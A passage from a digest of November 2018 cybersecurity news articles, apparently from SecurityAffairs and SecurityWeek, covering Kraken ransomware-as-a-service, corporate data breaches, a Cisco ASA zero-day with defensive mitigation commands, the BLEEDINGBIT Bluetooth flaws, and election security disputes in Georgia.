The group of work includes RoBhat Labs, a firm that has developed a technology to unmask bots’ activity on social networks.

“We provide the DNC with reports about what we’re seeing in terms of bot activity and where it’s being amplified,” DNC Chief Technology Officer Raffi Krikorian.
“We can’t tell you who’s behind these different operations, Twitter hides that from us, but with the technology you known when and how it’s happening,”

Kraken ransomware 2.0 is available through the RaaS model
5.11.2018 securityaffairs

The author of the infamous Kraken ransomware has released a new version of the malicious code and launched a RaaS distribution program on the Dark Web.
Researchers from Recorded Future’s Insikt Group and McAfee’s Advanced Threat Research team have discovered a new version of the malware that is offered through a RaaS distribution program on the Dark Web.

The new Kraken v.2 version is being advertised on an underground forum and is available through a ransomware-as-a-service (RaaS) model. With just $50 it is possible to join the affiliate program as a trusted partner and received a new improved build of the Kraken ransomware every 15 days. Affiliates receive 80 percent of the paid ransom and operators offer a 24/7 support service.

“The McAfee Advanced Threat Research team, working with the Insikt group from Recorded Future, found evidence of the Kraken authors asking the Fallout team to be added to the Exploit Kit. With this partnership, Kraken now has an additional malware delivery method for its criminal customers.” reads a post published by McAfee.

“We also found that the user associated with Kraken ransomware, ThisWasKraken, has a paid account. Paid accounts are not uncommon on underground forums, but usually malware developers who offer services such as ransomware are highly trusted members and are vetted by other high-level forum members. Members with paid accounts are generally distrusted by the community.”

Kraken Cryptor is a ransomware-as-a-service (RaaS) affiliate program that first appeared in the cybercrime underground on August 16, 2018, it was advertised in a top-tier Russian-speaking cybercriminal forum by the threat actor ThisWasKraken.

At the end of September, the security researcher nao_sec discovered that the Fallout Exploit Kit (the same used to distribute GandCrab ransomware) started to deliver the Kraken ransomware.

Kraken ransomware

After the victim pays the full ransom, the affiliate member sends 20 percent of the received payment to the RaaS to receive a decryptor key by the ThisWasKraken and forward on to the victim.

Like other threats, the Kraken Cryptor RaaS does not allow the infect users of a number of former Soviet bloc countries.

“In addition to the countries listed above, the latest samples of Kraken that have been identified in the wild no longer affect victims in Syria, Brazil, and Iran, suggesting that ThisWasKraken (or their associates) may have some connection to Brazil and Iran, though this is not confirmed. It is likely that Syria was added following the plea for help from a victim whose computer was infected by another ransomware called GandCrab.” reads the analysis published by Recorded Future.

Insikt Group experts noticed that RaaS operators don’t allow affiliates to submit Kraken sample files to antivirus services and don’t provides refunds for purchased payloads.

Below a map showing the distribution of victims that was released by the authors of the Kraken ransomware.

Kraken ransomware raas distribution

It has already infected 620 victims worldwide since August, but experts pointed out that the first real campaign only started last month, when attackers were masquerading the threat as a security solution on the website SuperAntiSpyware.

Kraken Cryptor 1.5 ransomware sample: https://www.virustotal.com/en/file/9c88c66f44eba049dcf45204315aaf8ba1e660822f9e97aec51b1c305f5fdf14/analysis/1536633203/ …
Note is now html, name: # How to Decrypt Files.html
Victims from CIS countries & Iran gets free decryption. W/ having "IP address & geolocation" data, citizenship card still needed...
🤔@BleepinComputer @demonslay335

10:45 AM - Sep 14, 2018
31 people are talking about this
Twitter Ads info and privacy
Experts highlighted that RaaS and affiliate programs are growing in the cybercrime underground attracting a growing number of wannabe criminals.

Further details, including IoCs are reported in the analysis published by both companies (Recorded Future and McAfee).

Apple T2 security chip in new MacBooks disconnects Microphone when lid is closed
5.11.2018 securityaffairs

Apple has implemented a new feature to protect the privacy of its MacBooks users aimed at preventing malicious software from spying on them.
The Apple T2 security chip installed in the new series of MacBooks includes a new hardware feature that physically disconnects the built-in microphone when the lid is closed.

The new T2 chip is installed in the 2018 MacBook Pro models that were presented earlier this year, but it was revealed only last week.

The feature is implemented in hardware because it is able to prevent rootkit and software with kernel privileges to control the microphone of the MacBooks.

“All Mac portables with the Apple T2 Security Chip feature a hardware disconnect that ensures that the microphone is disabled whenever the lid is closed.” reads the Apple security overview.

“This disconnect is implemented in hardware alone, and therefore prevents any software, even with root or kernel privileges in macOS, and even the software on the T2 chip, from engaging the microphone when the lid is closed. (The camera is not disconnected in hardware because its field of view is completely obstructed with the lid closed.) “

The new feature was presented last week at the Brooklyn Academy of Music in New York.

Experts are skeptical about this feature because the attackers can continue to spy on MacBooks users when they are working and the lid is open.

It would be better to implement a disconnect feature through a manual switch that allows the users to choose when turning the microphone/camera off.

MacBooks security feature

Apple T2 chip security also implements other security features such as the Secure Enclave coprocessor which provides the foundation for APFS encrypted storage, secure boot, and Touch ID on Mac

Kemp Cites Voter Database Hacking Attempt, Gives No Evidence
5.11.2018 securityweek

The office of Secretary of State Brian Kemp, who is also the Republican gubernatorial nominee, said Sunday it is investigating the state Democratic Party in connection with an alleged attempt to hack Georgia's online voter database, which is used to check in voters at polling places in the midterm elections.

The statement offered no evidence for the claim and didn't specify allegations against Georgia Democrats. But it quickly became a last-minute flashpoint in one of the nation's most closely contested governor's races as Tuesday's election loomed.

Democrats viewed the development as more evidence that Kemp's office, which oversees elections, was serving as an extension of his gubernatorial campaign. Republicans, meanwhile, framed it as an instance of Democrats trying to arrange nefarious votes. It's playing out the same day that Kemp will campaign alongside President Donald Trump in Macon.

As he left the White House on Sunday for Georgia, Trump said he hadn't been briefed on the issue and didn't know anything about it.

Kemp's office said federal authorities had been notified. The FBI declined to comment on the matter. A representative for the Department of Homeland Security confirmed the agency had been notified, but it deferred to Georgia officials for details.

Sunday's announcement came as the Coalition for Good Governance, a plaintiff in a lawsuit against Kemp alleging gross negligence in managing the state's elections, cited published reports saying a third party had discovered that Georgia's online registered voter database — which his office manages — is subject to hacking that could alter voters' information or remove them from the registered voter list altogether.

University of Michigan computer scientist Matthew Bernhard reviewed the reported flaw — which the Democratic Party on Saturday asked several computer scientists to review — and told The Associated Press it could have allowed anyone with access to an individual voter's personal information to alter the record of any voter in the system.

The finger-pointing is the latest turn in a campaign whose final weeks have been dominated by charges of voter suppression and countercharges of attempted voter fraud.

Democrat Stacey Abrams, who would become the nation's first black female governor if she wins, has called Kemp "an architect of voter suppression" and says he's used his post as chief elections officer to make it harder for certain voters to cast ballots. Kemp counters that he's following state and federal law and that it's Abrams and her affiliated voting advocacy groups trying to help people, including noncitizens, cast ballots illegally.

The atmosphere has left partisans and good-government advocates alike worrying about the possibility that the losing side will not accept Tuesday's results as legitimate. Polls suggest a tight race.

The accusation is not the first from Kemp accusing outsiders of trying to penetrate his office. Immediately after the 2016 general election, Kemp accused the federal Department of Homeland Security of trying to hack his office's network, an accusation dismissed in mid-2017 by the DHS inspector general as unfounded.

Even before he was running for governor, Kemp faced criticism over Georgia's election system.

Georgia's current centrally managed elections system lacks a verifiable paper trail that can be audited in case of problems. The state is one of just five nationwide that continues to rely exclusively on aged electronic voting machines that computer scientists have long criticized as untrustworthy because they are easily hacked and don't leave a paper trail.

Kemp has previously been accused by election-integrity activists of mismanaging state elections as Georgia's top elections official through poor oversight and in resisting the transparency they say is necessary to instill faith in the process.

In 2015, Kemp's office inadvertently released the Social Security numbers and other identifying information of millions of Georgia voters. His office blamed a clerical error.

His office made headlines again last year after security experts disclosed a gaping security hole that wasn't fixed until six months after it was first reported to election authorities. Personal data was again exposed for Georgia's 6.7 million voters, as were passwords used by county officials to access files.

Kemp's office laid the blame for that breach on Kennesaw State University, which managed the system on Kemp's behalf.

In the voting integrity case, a federal judge last month endorsed the plaintiff's arguments that Kemp has been derelict in his management of the state election system and that it violates voters' constitutional rights with its lack of verifiability and reliability.

Sauter Quickly Patches Flaw in Building Automation Software
3.11.2018 securityweek

A serious vulnerability that allows an attacker to steal files from an affected system has been found by a researcher in a building automation product from Swiss-based Fr. Sauter AG. It took the vendor only 10 days to release a patch.

The impacted product, CASE Suite, is designed for handling building automation projects. ICS-CERT says the software is used worldwide, particularly in the critical manufacturing sector.

Gjoko Krstic, a researcher with industrial cybersecurity firm Applied Risk, found that CASE Suite versions 3.10 and prior are affected by a high severity XML external entity (XXE) vulnerability. According to an advisory published by Applied Risk on Friday, the flaw impacts the CASE Components, CASE Sensors and CASE VAV applications.

The security hole is tracked as CVE-2018-17912 and it has been assigned CVSS scores of 7.5 (ICS-CERT) and 8.6 (Applied Risk).

“The application suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack,” Applied Risk said in its advisory. “The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML data file.”

Krstic told SecurityWeek that an attacker can exploit the vulnerability by getting the targeted user to open a specially crafted XML file using a vulnerable version of the CASE Suite software. For instance, the file can be sent via email, and it may not raise too much suspicion as the software includes functionality for saving and opening project or data files with this format.

In another attack scenario, if the attacker already has access to the system, they can place the malicious file anywhere (e.g., the Desktop folder) and it will be automatically loaded when the user browses to that location via the Sauter software. The researcher noted that the application automatically loads XML files found in folders browsed by the user – he described this as dangerous functionality.

Once the malicious XML file is loaded, it allows the attacker to steal any file from the compromised system, including configuration data, personal information, account credentials, and details about the system and the network housing it, Krstic said via email.

The vulnerability can also be exploited to cause the impacted software to enter a denial-of-service (DoS) condition.

It’s not uncommon for researchers to find vulnerabilities in building automation software. However, in this case it took Sauter only 10 days to release a patch after it was informed of the flaw by ICS-CERT on October 15. It often takes vendors hundreds of days to patch security holes in automation products.

Radisson Hotel Group Hit by Data Breach
3.11.2018 securityweek

Radisson Hotel Group this week informed members of its rewards program that their personal information may have been stolen as a result of a breach.

Radisson Hotel Group, formerly known as Carlson Rezidor Hotel Group, is one of the world’s largest hotel groups, with more than 1,400 hotels in 114 countries. Its portfolio includes Radisson Collection, Radisson Blu, Radisson, Radisson RED, Park Plaza, Park Inn by Radisson, Country Inn & Suites by Radisson, and prizeotel hotels.

On October 1, the company discovered that systems handling its Radisson Rewards program were breached and the data of a “small percentage” of members may have been compromised.

While Radisson’s investigation is ongoing, to date it has found no evidence that payment card information, passwords, or travel history have been accessed. The attackers may have obtained names, addresses, email addresses and, in some cases, company names, phone numbers, Radisson Rewards member numbers, and frequent flyer numbers.

Impacted accounts have been identified and are being monitored for any suspicious activity, the firm said.

Affected individuals will be contacted via email, but Radisson has advised customers to be on the lookout for phishing emails that may be launched in the upcoming period as a result of this incident.

“While the ongoing risk to your Radisson Rewards account is low, please monitor your account for any suspicious activity,” Radisson said in a notice posted on its rewards website.

Several major hotel chains suffered data breaches in the past few years. The list includes Hyatt, InterContinental, Huazhu, Hard Rock Hotel & Casino Las Vegas, Trump Hotels, Millennium Hotels & Resorts and Omni Hotels.

Joshua Adam Schulte, ex CIA employee, accused of continuing leaks from prison
3.11.2018 securityaffairs

Federal prosecutors accuse former CIA employee Joshua Adam Schulte of continuing leaks classified national defense materials from prison.
Joshua Adam Schulte (30) has been charged with 13 count indictment in June.

In middle May, both The New York Times and The Washington Post, revealed the name of the alleged source of the Vault 7 leak, the man who passed the secret documents to Wikileaks. According to his LinkedIn profile, Schulte worked for the NSA for five months in 2010 as a systems engineer, after this experience, he joined the CIA as a software engineer and he left the CIA in November 2016.

Schulte was identified a few days after WikiLeaks started leaking the precious dumps.

Schulte was arrested for possession of child pornography, he was charged on three counts of receipt, possession and transportation of child pornography in August 2017.

The man was released in September 2017, but in December he was arrested again for violating the conditions of his release.

Now Joshua Adam Schulte faces new charges included in a new indictment filed in Manhattan federal court, he was charged with the unlawful transmission and attempted unlawful transmission of national defense secrets from prison.

“Prosecutors requested a new arraignment on the rewritten indictment which they said outlined “his continued, brazen disclosure of classified information while incarcerated at the Metropolitan Correctional Center.” The center is next to Manhattan federal court.” reported the Associated Press.

“In a letter to Judge Paul A. Crotty, prosecutors said they learned in May that Schulte had distributed search warrant materials that were supposed to remain secret to family members so that they could be distributed to others, including members of the media. They said they also learned that Schulte provided materials containing classified information to his family members as well.”

According to prosecutors, the government was aware that Schulte has been using one or more smuggled cellphones to communicate clandestinely with individuals outside the prison.

“An FBI search found multiple contraband cellphones including at least one with significant encryption, about 13 email and social media accounts and other electronic devices, prosecutors said.” continues the AP.

According to prosecutors Joshua Adam Schulte had sent classified information to third parties, he also used an encrypted email account to transmit them.

Since October 1st, Schulte was assigned to more restrictive detention conditions, likely to an isolated part of the correctional center.

FIFA was hacked again, this is the second hack in a year
3.11.2018 securityaffairs Hacking

According to the New York Times, FIFA has suffered the second hack in a year, new documents are set to be published on Friday by Football Leaks.
The Fédération Internationale de Football Association, aka FIFA, is a governing body of association football, futsal, and beach soccer.

FIFA reveals it was the victim of a new successful phishing campaign that resulted in the exposed confidential information of the organizations.

This is the second time that Federation was hacked in a year, the organization confirmed the incident, but did not disclose details of the cyber attack.
The FIFA hack occurred in March, according to the experts it is not related to the previous one that was carried out by the Russia-linked APT group Fancy Bears.

In August 2017, Fancy Bears hackers claimed that around 160 football players failed drug tests in 2015, and 25 2010 World Cup players used doping medicines.

FIFA logo

This second hack was discovered by Football Leaks after it has received a new collection of internal documents. Football Leaks is the same organization that published documents obtained in the first hack.

“UEFA officials were targeted in a so-called phishing operation in which third parties fool their targets into giving up password-protected login details, though the organization has been unable to find traces of a hack in its computer systems.” states The New York Times.

“FIFA officials discussed the prospect of a new hack, and more uncomfortable revelations in the news media, on the edges of the FIFA Council meeting last week in Kigali, Rwanda.”

FIFA released the following statement after the announcement of the hack:

“Fifa condemns any attempts to compromise the confidentiality, integrity and availability of data in any organization using unlawful practices.”

The documents were first obtained by the German newsweekly Der Spiegel that shared them with an investigative reporting consortium known as European Investigative Collaborations (EIC).

European Investigative Collaborations announced it will begin publishing the information as soon as tomorrow.

Top Australia Defence company Austal notifies a serious security breach
3.11.2018 securityaffairs

Austal, a top Australia defence firm reports also working with the United States Navy has suffered a serious security breach.
Austal, a top Australia defence firm reports working with the US Navy has suffered a serious security breach, hackers accessed to personnel files and that it was the subject of an extortion attempt.

Austal reported the data breach to the Australian Securities Exchange (ASX) on Thursday evening, it also notified affected “stakeholders”.

“Austal Limited (ASX:ASB) advised that its Australian business has detected and responded to a breach of the company’s data management systems by an unknown offender.” reads the data breach notification published by the company.

“Austal Australia’s Information Systems and Technology (IS&T) team have restored the security and integrity of the company’s data systems and have implemented, and continues to implement, additional security measures to prevent further breaches. A small number of stakeholders who were potentially directly impacted have been informed.”

Australian Cyber Security Centre (ACSC) and the Australian Federal Police have launched an investigation on the security breach.

According to the company the security breach has had no impact on ongoing operations, experts also pointed out the Austal’s business in the United States was not affected by the incident because it leverages on a separate IT infrastructure.

Austal claimed that the breach doesn’t expose information affecting national security or the commercial operations of the company.

“No company wants to lose control of its information, but there is no evidence to date to suggest that information affecting national security nor the commercial operations of the company have been stolen: ship design drawings which may be distributed to customers and fabrication sub-contractors or suppliers are neither sensitive nor classified.” continues the notification.

Austal Multi-Role Vessel

Hackers gained access to the personnel email addresses and mobile phone numbers, attackers purported to offer them for sale online and “engage in extortion”.

“Following the breach the offender purported to offer certain materials for sale on the internet and engage in extortion. The company has not and will not respond to the extortion attempts.” continues the note.

Australia’s department of defence declared it “can confirm that no compromise of classified or sensitive information or technology has been identified so far.”

Austal has manufactured over 260 vessels for more than 100 operators in its 28-year history, it has won a contract to build littoral combat ships for the US Navy.

Defence contractors are a privileged target for hackers, stolen information could be used in targeted attacks or can be resold on the cybercrime underground. Recently experts from the Italian cyber security firm Yoroi uncovered a mysterious hacking campaign aimed at Italian Naval industry companies.

CISCO warn of a zero-day DoS flaw that is being actively exploited in attacks
3.11.2018 securityaffairs
Attack  Vulnerebility

Security experts from CISCO warn of a zero-day vulnerability that is being actively exploited in attacks in the wild.
The flaw, tracked as CVE-2018-15454, affects the Session Initiation Protocol (SIP) inspection engine of Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD). The flaw could be exploited by a remote attacker to trigger a DoS condition on the vulnerable device.

“A vulnerability in the Session Initiation Protocol (SIP) inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload or trigger high CPU, resulting in a denial of service (DoS) condition.” reads the security advisory published by Cisco.

“The vulnerability is due to improper handling of SIP traffic. An attacker could exploit this vulnerability by sending SIP requests designed to specifically trigger this issue at a high rate across an affected device.”

Experts from Cisco discovered the vulnerability while resolving a Cisco TAC support case.

The following products running ASA 9.4 and above, and FTD 6.0 and later, are affected by the vulnerability:

3000 Series Industrial Security Appliance (ISA)
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
CISCO NX-OS Software

At the time of the disclosure, there is no software update that addresses the flaw, anyway, the company provided several mitigation options.

A possible mitigation consists in disabling the SIP inspection, but this solution is not feasible in many cases because it could interrupt SIP connections.

To disable SIP inspection, configure the following:

ASA Software
policy-map global_policy
class inspection_default
no inspect sip
FTD Software Releases
configure inspection sip disable
Another option is to block the hosts by using an access control list (ACL) or in an alternative offending host can be shunned using the shun <ip_address> command in EXEC mode. In this latter case, users have to consider that shunning does not persist across reboot.

Cisco also suggests filtering on traffic having ‘Sent-by Address’ header set to that is associated with bad packets that could crash the security appliance.

Last mitigation provided by the tech giant is to implement a rate limit on the SIP traffic via the Modular Policy Framework (MPF).

Cyber attack exposes sensitive data about a nuclear power plant in France
3.11.2018 securityaffairs

A cyber attack on a French firm Ingerop allowed attackers to access confidential documents related to nuclear power plant plans in France.
The hacker stole more than 65 gigabytes of documents back in June, the huge trove of documents includes nuclear power plant plants and blueprints for prisons and tram networks.

According to the media, some of the stolen data were found on a rented server in Germany.

“Thousands of sensitive documents pertaining to nuclear power plants, prisons and tram networks have been stolen from the servers of a French company in a cyberattack, German and French media have reported Friday.” reported the German website DW.com.

“The data illegally accessed from the French company Ingerop back in June amounted to more than 65 gigabytes, according to reports by German public broadcaster NDR, the daily Süddeutsche Zeitung and French newspaper Le Monde.”

According to an Ingerop spokeswoman quoted by NDR, hackers accessed to more than 11,000 files from a dozen projects.

The sensitive documents include detailed information on the plant, such as the locations of video cameras for a French high-security prison and documents about a planned nuclear-waste dump in northeastern France,

Attackers also stole personal details about more than a thousand Ingerop workers.

Some of the documents were related to France’s oldest nuclear power plant Fessenheim that is going to close by 2022 and that is located on the border to Germany, reports said.

nuclear power plant Fessenheim

The availability of such kind of data in the wrong hands could expose the plant and the company workers to many threats, including a terrorist plot.

Top Australia Defence Firm Reports Serious Cyber Breach
2.11.2018 securityweek

A top Australian defence firm with major US Navy contracts has admitted its personnel files were breached and that it was the subject of an extortion attempt.

Austral -- which among other things makes small, quick ships for warfare close to shore -- said its "data management system" had been infiltrated by an "unknown offender".

In a statement, the company claimed that there was "no evidence to date" that "information affecting national security nor the commercial operations of the company have been stolen".

However it said staff email addresses and mobile phone numbers were accessed and the offender purported to offer materials for sale on the internet and "engage in extortion".

"The company has not and will not respond to extortion attempts."

Australia's department of defence said it "can confirm that no compromise of classified or sensitive information or technology has been identified so far."

The company was at pains to point out that the breach hit only its Australian business and did not extend to US projects, because the two computer systems are not linked.

Austral has won a controversial contract to build littoral combat ships for the US Navy.

The military says it does not need all the vessels paid for, but the project has been aggressively championed by powerful members of the US Congress from Alabama, were Austral's US shipyard is located.

Qualys Acquires Container Security Firm Layered Insight
2.11.2018 securityweek

Security and compliance solutions provider Qualys on Tuesday announced the acquisition of Layered Insight, a company that specializes in protecting container-native applications.

Layered Insight was acquired for $12 million. The deal also includes another $4 million that is tied to an earn-out, and $4 million for the employment of key employees through 2019.

Similar to earlier acquisitions made by Qualys, the company will keep Layered Insight’s employees. Co-founders Asif Awan and John Kinsella will join Qualys as CTO of Container Security and VP of Engineering in Container Security, respectively.

Qualys unveiled a new product designed for securing containers across cloud and on-premises deployments in June 2017.

With the acquisition of Layered Insight, the company hopes to further improve its solutions, including with deeper visibility into containers, the ability to detect and prevent breaches during runtime, and extended visibility, compliance and protection for serverless container-as-a-service (CaaS) installations.

Qualys expects to complete integration of Layered Insight technology into its cloud platform by the second quarter of 2019.

“By integrating Layered Insight’s unique technology into the Qualys Container Security App, we will add the ability to provide dynamic analysis of running containers, and automated enforcement of the container environment,” said Philippe Courtot, chairman and CEO of Qualys.

“Layered Insight's unique technology brings transparent orchestration to container security. The ability to instrument images pushes automated deployment deep into the DevOps CI/CD pipeline, thus removing the resistance at deployment. This instrumentation provides real-time visibility into containers at run-time complementing our current capabilities of accessing container images in the build system for vulnerabilities and configuration issues,” Courtot added.

Cisco Warns of Zero-Day Vulnerability in Security Appliances
2.11.2018 securityweek

Cisco informed customers on Wednesday that some of its security appliances are affected by a serious vulnerability that has been actively exploited.

The zero-day flaw, tracked as CVE-2018-15454, is related to the Session Initiation Protocol (SIP) inspection engine used in the company’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software.

A remote and unauthenticated attacker can exploit the vulnerability to cause an affected device to reload or consume CPU resources, resulting in a denial-of-service (DoS) condition. The bug, related to how SIP traffic is handled, can be triggered by sending specially crafted SIP requests to the targeted device at a high rate.

Cisco said it became aware of the vulnerability during the resolution of a technical assistance center (TAC) support case.

The flaw impacts ASA software version 9.4 and later and FTD software version 6.0 and later if SIP inspection is enabled – the feature is enabled by default. The list of affected products includes 3000 Series Industrial Security Appliance (ISA); ASA Virtual; ASA 5500-X firewall; ASA service modules for Catalyst 6500 and 7600 switches and routers; Firepower 2100, 4100 and 9300; and FTD Virtual.

No patches or workarounds are available at this time, but attacks can be mitigated by blocking hosts that launch attacks, disabling SIP inspection, and filtering out traffic with a “Sent-by Address” set to, which Cisco says has been used in many of the attacks it spotted.

As for indicators of compromise (IoC), Cisco noted that the show conn port 5060 command will show a large number of incomplete SIP connections if the vulnerability is being exploited. Furthermore, the show process cpu-usage non-zero sorted command will indicate high CPU usage.

“Successful exploitation of this vulnerability can also result in the affected device crashing and reloading. After the device boots up again, the output of show crashinfo will show an unknown abort of the DATAPATH thread. Customer should reach out to Cisco TAC with this information to determine whether the particular crash was related to exploitation of this vulnerability,” Cisco said.

Zero-day vulnerabilities in Cisco products are not very common. In the past two years, the company addressed two such flaws: one leaked by Shadow Brokers from the NSA-linked Equation Group, and one made public by WikiLeaks after it had been stolen from the CIA.

There were also at least two campaigns this year that exploited Cisco ASA vulnerabilities shortly after they were patched.

Google Boosts Account Security With New Tools, Protections
2.11.2018 securityweek

Google on Wednesday announced several new tools and protection mechanisms designed to help users secure their accounts and recover them in case they have been compromised.

It’s not uncommon for accounts to get hacked after their username and password have been obtained by malicious actors through phishing attacks. Since many users still haven’t enabled two-factor authentication, Google has introduced an additional layer of security during the login process.

When the username and password are entered on the sign-in page, a risk assessment is run and the login is only successful if nothing is suspicious. However, for the risk assessment to work, Google says users need to have JavaScript enabled.

The tech giant pointed out that JavaScript is enabled by default in most web browsers, but noted that 0.1% of its customers have decided to disable it. If JavaScript is disabled and the risk assessment cannot be completed, authentication will fail.

Google requires users to enable JavaScript when accessing their account

Once users have logged in, the Security Checkup tool introduced by Google last year helps them improve the security of their account by offering customized guidance. The tool is constantly enhanced and the company recently added protection against harmful mobile apps based on recommendations from Google Play Protect. It now also allows users to remove their account from devices they no longer use.

While Google currently notifies users when third-party sites or apps are given access to Gmail and Google Contacts data, the company says it will soon add Google Accounts to the list.

In case an account has been compromised, Google now provides a step-by-step process that helps users check security settings, protect other accounts linked to the hacked account, verify financial activity to see if payment methods linked to the account have been abused, and review files in Gmail and Drive to determined if they have been accessed or misused.

Law Enforcement Faces Dilemma in Assessing Online Threats
2.11.2018 securityweek

Their anger is all over social media for the whole world to see, with rants about minorities, relationships gone bad or paranoid delusions about perceived slights.

The perpetrators of mass shootings often provide a treasure trove of insight into their violent tendencies, but the information is not always seen by law enforcement until after the violence is carried out. In addition, rants and hate speech rarely factor into whether someone passes a background check to buy guns.

The massacre at a Pittsburgh synagogue, the pipe bombing attempts from last week and the Florida high school shooting this year have underscored the dilemma of law enforcement around the country in assessing the risk of people making online rants at a time when social media has become so ubiquitous.

"We can go out on Twitter and there are loads of people saying insane stuff, but how do you know which is the one person? It's always easy after the fact, to go: 'That was clear.' But clearly everyone spouting their mouth doesn't go and shoot up a synagogue," said David Chipman, a retired agent of the federal Bureau of Alcohol, Tobacco, Firearms and Explosives and now senior policy adviser for the Giffords Center.

Robert Bowers, the man accused of opening fire at a synagogue in Pittsburgh, expressed virulently anti-Semitic views on a social media site called Gab, according to an Associated Press review of an archived version of the posts made under his name. The cover photo for his account featured a neo-Nazi symbol, and his recent posts included a photo of a fiery oven like those used in Nazi concentration camps during World War II. Other posts referenced false conspiracy theories suggesting the Holocaust was a hoax.

It was only just before the shooting that the poster believed to be Bowers seemed to cross the line, posting: "I can't sit by and watch my people get slaughtered. Screw your optics, I'm going in." Authorities say Bower killed 11 people and injured six others, including four officers who responded.

Keeping tabs on social media posts has been used for years by law enforcement to try to identify potential threats. The task is enormous and it's an inexact science. The volume of posts is significant and the question arises: Is something a true threat or free speech?

They are mindful of the fact that the First Amendment protects Americans' right to express even speech that many in society find abhorrent — and have to make often-subjective decisions about what crosses the line.

Among more than 550 police departments across the country surveyed several years ago by the International Association of Chiefs of Police, about three-quarters said they regularly searched social media for potential threats.

Lt. Chris Cook, spokesman for the Arlington, Texas, Police Department, said the searches are often done manually, using keywords to try to identify troubling posts.

"It's very time consuming, it's very staff and resource intensive and you have humans involved in the process so there is the potential that law enforcement can miss something," Cook said, adding that departments can't rely on social media alone. The community needs to be involved to report any suspicious behavior.

"Everyone has to be our extra eyes and ears out there," he said.

In one case where vigilance paid off, authorities say a black woman received troubling racist, harassing messages on Facebook from a man she didn't know, prompting her to call police. The tip from the New Jersey woman led Kentucky police to a home where they found Dylan Jarrell with a firearm, more than 200 rounds of ammunition, a bulletproof vest, a 100-round high-capacity magazine and a "detailed plan of attack." He was arrested just as he was leaving his driveway.

Bowers is not alone among alleged mass shooters in making racist or bigoted comments online.

Dylann Roof, convicted of the 2015 slaying of nine black churchgoers in South Carolina, had posted a 2,000-word racist rant and posed in photos with firearms and the Confederate flag. Nikolas Cruz, the teenager charged in the slaying of 17 students and adults at a high school in Parkland, Florida, hurled online slurs against blacks and Muslims, and went so far as to state he wanted to be a "professional school shooter."

The rants did not affect their ability to buy guns. When purchasing a firearm, criminal background checks only look for any records showing a criminal past or mental health problems that led to an involuntary commitment.

"I always felt as an ATF agent, the way our laws were structured, ATF stood for 'After the Fact'," Chipman said.

There have been some changes, however, to make it easier to alert authorities to warning signs. "Red flag" laws have been enacted in 13 states in the past couple of years, allowing relatives or law enforcement with concerns about a person's mental health to go to court and seek to have firearms removed at least temporarily.

But Erich Pratt, executive director of Gun Owners of America, cautioned against using social media content to deny someone the constitutional right to own a firearm.

"I abhor hateful comments by the left or the right but I don't think you lose your rights for simply uttering," Pratt said.

He likened it to the Tom Cruise movie "Minority Report," about law enforcement in the future using psychic technology to nab murderers before they commit a crime.

"It's dangerous to go down this road of Minority Report with pre-crime," he said. "Nobody should lose their rights without due process."

Bluetooth Chip Flaws Expose Enterprises to Remote Attacks
2.11.2018 securityweek
Exploit  Vulnerebility

Millions of access points and other networking devices used by enterprises around the world may be exposed to remote attacks due to a couple of vulnerabilities discovered by researchers in Bluetooth Low Energy (BLE) chips made by Texas Instruments.

Bluetooth Low Energy, or Bluetooth 4.0, is designed for applications that do not require exchanging large amounts of data, such as smart home, health and sports devices. BLE stays in sleep mode and is only activated when a connection is initiated, which results in low power consumption. Similar to the classic Bluetooth, BLE works over distances of up to 100 meters (330 feet), but its data transfer rate is typically 1 Mbit/s, compared to 1-3 Mbit/sec in the case of classic Bluetooth.

Researchers at IoT security company Armis, who in the past discovered the Bluetooth vulnerabilities known as BlueBorne, now claim to have found two serious vulnerabilities in BLE chips made by Texas Instruments. These chips are used in access points and other enterprise networking devices made by Cisco, including Meraki products, and HP-owned Aruba Networks.

According to Armis, these vendors provide 70% of the wireless access points sold to enterprises every year, but it’s unclear exactly how many devices are vulnerable.


The flaws, dubbed BLEEDINGBIT by Armis, can allow a remote and unauthenticated attacker to take complete control of impacted devices and gain access to the enterprise networks housing them.

Devices used in the healthcare sector, such as insulin pumps and pacemakers, also use the affected BLE chips so they could be vulnerable to BLEEDINGBIT attacks as well.

The IoT security firm is in the processes of assessing the full impact of the BLEEDINGBIT vulnerabilities, but so far it determined that they affect several Texas Instruments chips. One of the flaws, tracked as CVE-2018-16986, has been found in CC2640 and CC2650 chips running BLE-STACK 2.2.1 and earlier, and CC2640R2 running version 1.0 or earlier.

The bug is present in several Cisco Aironet and Meraki MR access points. However, exploitation is only possible if the device is actively scanning.

The second flaw, CVE-2018-7080​, is present in CC2642R2, CC2640R2, CC2640, CC2650, CC2540 and CC2541 chips. However, the security hole can only be exploited if the device using the chip has the over-the-air firmware download (OAD) feature enabled. So far, only some APs from Aruba have been found to use this feature.

The first vulnerability can be exploited for remote code execution by an attacker who is in range of the targeted device. If BLE is turned on and the device is actively scanning, a malicious actor can send specially crafted packets in order to trigger a memory overflow and execute arbitrary code.

The attacker can install a backdoor on the chip and then gain complete control of the system. In the case of access points, the attacker can use the compromised AP to spread to other devices on the network, even if segmentation is in place.

The second bug, which to date has only been found to affect Aruba devices, allows an attacker to deliver a malicious update to the targeted AP and rewrite its operating system. The attacker can then gain complete control of the device.

This attack is made easier by the fact that all Aruba access points share the same OAD password, which can be obtained by intercepting a legitimate update or reverse engineering the device. However, Aruba pointed out that the exploit only works if BLE radio has been enabled – the feature is disabled by default.

Attacks can be conducted from up to 100 meters, but Armis told SecurityWeek that the distance can be doubled or even tripled if the attacker uses a directional antenna. Once the AP has been compromised, the attacker can create an outbound connection over the Internet and they no longer need to stay in range. Armis says the attacks can be carried out in 1-2 minutes.

Armis notified all affected vendors about the vulnerabilities this summer. Texas Instruments addressed CVE-2018-16986 with the release of BLE-STACK version 2.2.2. However, in the case of the OAD-related flaw, the chipmaker pointed out that the feature should not be used in production environments. Cisco and Aruba have also released patches for affected products.

Cyberattacks Against Energy Sector Are Higher Than Average: Report
